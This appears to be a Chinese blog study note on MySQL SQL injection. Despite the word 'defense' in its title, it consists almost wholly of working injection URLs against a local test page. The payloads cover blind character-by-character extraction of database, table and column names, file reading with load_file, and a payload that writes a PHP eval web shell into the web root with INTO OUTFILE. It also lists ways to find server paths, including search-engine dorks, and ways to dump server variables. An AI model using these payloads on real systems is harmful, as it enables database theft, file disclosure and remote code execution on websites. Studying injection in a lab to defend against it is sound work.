WEB安全 php+mysql5注入防御（二）

第四天：

一、新的注入函数：

• ascii()
• substring("string",n,m)                     n>=1
• limit n,m                                        n>=0
• length()
• union                                            合并两个或多个 SELECT 语句的结果集,不重复
• union all                                        同上,但允许重复数据
• select distinct                                等同于select,但会去重
• load_file()                                      文件读取
• into outfile                                     文件写入

information_schema.schemata          存储所有数据库信息

• SCHEMA_NAME                             数据库名
• DEFAULT_CHARACTER_SET_NAME  数据库编码
• GLOBAL_VARIABLES                       所有全局变量

 二、猜解数据库个数、库名、表名、列名：

//猜解当前数据库长度、及库名
http://127.0.0.1/first.php?x=1 and Length((database()))=5 //当前数据库长度(数据库名:sqlin)
http://127.0.0.1/first.php?x=1 and ascii(substring((database()),1,1))=115 //猜解当前数据库第一位,ascii(s)=115
http://127.0.0.1/first.php?x=1 and ascii(substring((database()),2,1))=113


//判断数据库个数
http://127.0.0.1/first.php?x=1 and (select count(schema_name) from information_schema.schemata)=6


//判断所有数据库长度
http://127.0.0.1/first.php?x=1 and length((select distinct schema_name from information_schema.schemata limit 0,1))=18 //等同于下一条
http://127.0.0.1/first.php?x=1 and Length((select distinct schema_name from `information_schema`.schemata limit 0,1))=18 //第一个数据库
http://127.0.0.1/first.php?x=1 and Length((select distinct schema_name from `information_schema`.schemata limit 1,1))=5
http://127.0.0.1/first.php?x=1 and Length((select distinct schema_name from `information_schema`.schemata limit 2,1))=17
http://127.0.0.1/first.php?x=1 and Length((select distinct schema_name from `information_schema`.schemata limit 3,1))=5
http://127.0.0.1/first.php?x=1 and Length((select distinct schema_name from `information_schema`.schemata limit 4,1))=9
http://127.0.0.1/first.php?x=1 and Length((select distinct schema_name from `information_schema`.schemata limit 5,1))=4
http://127.0.0.1/first.php?x=1 and Length((select distinct schema_name from `information_schema`.schemata limit 6,1))>0 //不存在第7个数据库


//猜解所有数据库库名
http://127.0.0.1/first.php?x=1 and ascii(substring((select distinct schema_name from `information_schema`.schemata limit 0,1),1,1))<79 //第一个数据库名的第一个字符ascii值
http://127.0.0.1/first.php?x=1 and ascii(substring((select distinct schema_name from `information_schema`.schemata limit 1,1),1,1))<79 
http://127.0.0.1/first.php?x=1 and length((SELECT table_name from information_schema.tables where table_schema=0x73716C696E limit 0,1))=4 //第一个数据库的第一个表名的长度
http://127.0.0.1/first.php?x=1 and ascii(substring((SELECT column_name from information_schema.columns where table_schema=0x73716C696E and table_name=0x6E657773 limit 0,1),1,1))=105 (i)
http://127.0.0.1/first.php?x=1 and ascii(substring((SELECT column_name from information_schema.columns where table_schema=0x73716C696E and table_name=0x6E657773 limit 0,1),2,1))=100 (d)

 

备：
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
http://127.0.0.1/first.php?x=1 and ascii(substring ((0x41),1,1))=0x41 //抓包抓到的语句,substring后有一个空格,导致这段注入无效,可能是工具bug

 

文件读取：

• 1. 要么使用“\”，要么使用“/”，避免使用“”造成转义
• 2. load_file("C:/phpStudy/WWW/first.php")可以写成十六进制格式load_file(0xnnnnnnn)
• http://127.0.0.1/first.php?x=1 union select load_file("C:/phpStudy/WWW/first.php"),2,3

文件写入：

• http://127.0.0.1/first.php?x=1 union select "<?php eval($_GET['caidao']); ?>",2,3 into outfile "C:/phpStudy/WWW/caidao.php"

网站路径获取方式：

• 1.报错显示，漏洞报错
• 2.遗留文件：phpinfo.php、php.php、info.php、test.php
• 3.读取配置文件
• 4.社工：域名即路径、google搜索、inurl:edu.cn warning、

　　

三、information_schema下global_variables表在注入时可能有用的信息：

• version 数据库版本
• basedir 数据库安装路径
• datadir 数据库文件存放路径
• hostname 服务器的主机名
• port 数据库端口
• pid_file 进程pid文件路径
• general_log_file 日志文件路径
• character_set_server 字符编码

http://127.0.0.1/first.php?x=1 UNION SELECT variable_name,2,3 from information_schema.global_variables
http://127.0.0.1/first.php?x=1 UNION SELECT variable_value,2,3 from information_schema.global_variables where variable_name=0x76657273696F6E //version版本,直接通过VERSION()也可以获取
http://127.0.0.1/first.php?x=1 UNION SELECT variable_value,2,3 from information_schema.global_variables where variable_name=0x62617365646972 //basedir数据库的路径
http://127.0.0.1/first.php?x=1 UNION SELECT variable_value,2,3 from information_schema.global_variables where variable_name=0x44415441444952 //datadir数据库文件存放路径
http://127.0.0.1/first.php?x=1 UNION SELECT variable_value,2,3 from information_schema.global_variables where variable_name=0x686F73746E616D65 //hostname服务器主机名
http://127.0.0.1/first.php?x=1 UNION SELECT variable_value,2,3 from information_schema.global_variables where variable_name=0x504F5254 //PORT数据库端口
http://127.0.0.1/first.php?x=1 UNION SELECT variable_value,2,3 from information_schema.global_variables where variable_name=0x5049445F46494C45 //pid_file进程pid文件路径
http://127.0.0.1/first.php?x=1 UNION SELECT variable_value,2,3 from information_schema.global_variables where variable_name=0x47454E4552414C5F4C4F475F46494C45 //GENERAL_LOG_FILE日志文件路径
http://127.0.0.1/first.php?x=1 UNION SELECT variable_value,2,3 from information_schema.global_variables where variable_name=0x4348415241435445525F5345545F534552564552 //CHARACTER_SET_SERVER字符编码
mysql> show variables; //或者在交互模式中查看所有全局变量

低权限用户也可以访问：
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| test               |
+--------------------+
2 rows in set (0.00 sec)

mysql> use information_schema;
Database changed
mysql> select variable_value from global_variables where variable_name=0x686F73746E616D65;
+----------------+
| variable_value |
+----------------+
| win7-PC        |
+----------------+
1 row in set (0.00 sec)